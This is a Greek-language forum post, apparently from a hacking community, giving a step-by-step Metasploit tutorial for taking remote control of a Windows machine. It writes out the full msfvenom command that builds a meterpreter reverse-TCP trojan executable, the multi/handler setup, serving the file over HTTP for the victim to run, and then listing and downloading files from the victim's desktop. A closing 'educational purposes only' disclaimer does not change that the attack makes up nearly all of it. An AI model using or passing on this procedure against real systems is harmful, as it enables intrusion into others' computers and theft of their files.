Chatroom Rules

[Mata 56]

Καλησπέρα. Σήμερα θα δούμε πως να πάρουμε απομακρυσμένη πρόσβαση σε Windows συσκευή από metasploit. Αρχικά θα ανοίξουμε το msfvenom για να δημιουργήσουμε το trojan το οποίο θα μας δώσει την πρόσβαση

 

 

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.29.161.68 LPORT=4444 -f exe > greekhacking.exe

-p = payload

-LHOST: localhost

LPORT: local port

-f: file

 

Για να δούμε την ip μας και να την περάσουμε στο lhost, κάνουμε ifconfig σε ένα άλλο τερματικό.

 

Αφού φτιάξουμε trojan, ανοίγουμε το metasploit (msfconsole)

 

Αφού ανοίξει πληκτρολογούμε 

use multi/handler

 

Αμέσως μετά βάζουμε payload. 

set PAYLOAD windows/x64/meterpreter/reverse_tcp

 

 

Αφού βάλουμε και payload πατάμε show options για να δούμε τις επιλογές μας.

 

Βλέπουμε ότι είναι κενό το lhost οπότε πάμε πάλι στην εντολή ifconfig για να το περάσουμε. Οπότε πατάμε "set LHOST <ip>".

Να πω επίσης ότι αν το LPORT σας είναι default αλλάξτε το ανάλογα με το τι βάλατε στο msfvenom πληκτρολογόντας "set LPORT <PORT>".

Τώρα θα πάμε σε ένα άλλο τερματικό έτσι ώστε να ανοίξουμε server για να μπορέσουμε να κάνουμε την επίθεση. Πάμε σε τερματικό και πληκτρολογούμε αυτό

Όταν λοιπόν είμαστε έτοιμοι, γράφουμε την εντολή exploit στο τερματικό μας

 

Τώρα το metasploit περιμένει αντίδραση από τον χρήστη έτσι ώστε να μας δώσει πρόσβαση. Πάμε να την πάρουμε. Πάμε στα windows στην πορκειμένη περίπτωση που είμαι local, και κατεβάζουμε το αρχείο.

http://<ip>/greekhacking.exe (όπως ονόμασα το αρχείο στο msfvenom)

και αμέσως μετά το τρέχουμε και βλέπουμε παρακάτω πως όταν το ανοίγουμε το metasploit αντιδρά και αυτό και μας δίνει πρόσβαση

 

(Συγγνώμη αν δεν πίασει το gif)

 

Αφού μας δώσει την πρόσβαση μπορούμε να γράψουμε την εντολή help για να δούμε τα commands που μπορούμε να χρησιμοποιήσουμε. Στην περίπτωσή μου απλά θα πάω στο path C:\\Users\User\Desktop και θα κάνω ls για να δω τα αρχεία στο desktop του χρήστη

 

 

Εδώ είναι το desktop (επιφάνεια εργασίας). Πάμε να δούμε τι έχει μέσα το αρχείο greekhacking.txt και να το "υποκλέψουμε".

Για να το κάνουμε αυτό πατάμε download greekhacking.txt

 

Κατέβηκε. Πάμε στο path /home/mata/ για να ανοίξουμε το αρχείο με vi έτσι ώστε να το δούμε

 

 

Ανοίγουμε το αρχείο και βλέπουμε πως έχει μέσα αυτό ακριβώς. Πάμε και στην συσκευή του θύματος να δούμε πως είναι το αρχείο

 

 

Ακριβώς το ίδιο!

 

Αυτό ήταν λοιπόν το tutorial για σήμερα, ήταν ΜΟΝΟ για εκπαιδευτικούς σκοπούς και δεν φέρω καμία ευθύνη

---------------------------------------------------------------------------------------------------------------

Buy Me A Coffee: https://www.buymeacoffee.com/mataroot

Συνδρομή: https://www.buymeacoffee.com/mataroot/membership

Discord Server: https://discord.gg/aStuy26X

 

 

 

 

Edited 12 Σεπτεμβρίου 2022 by Mata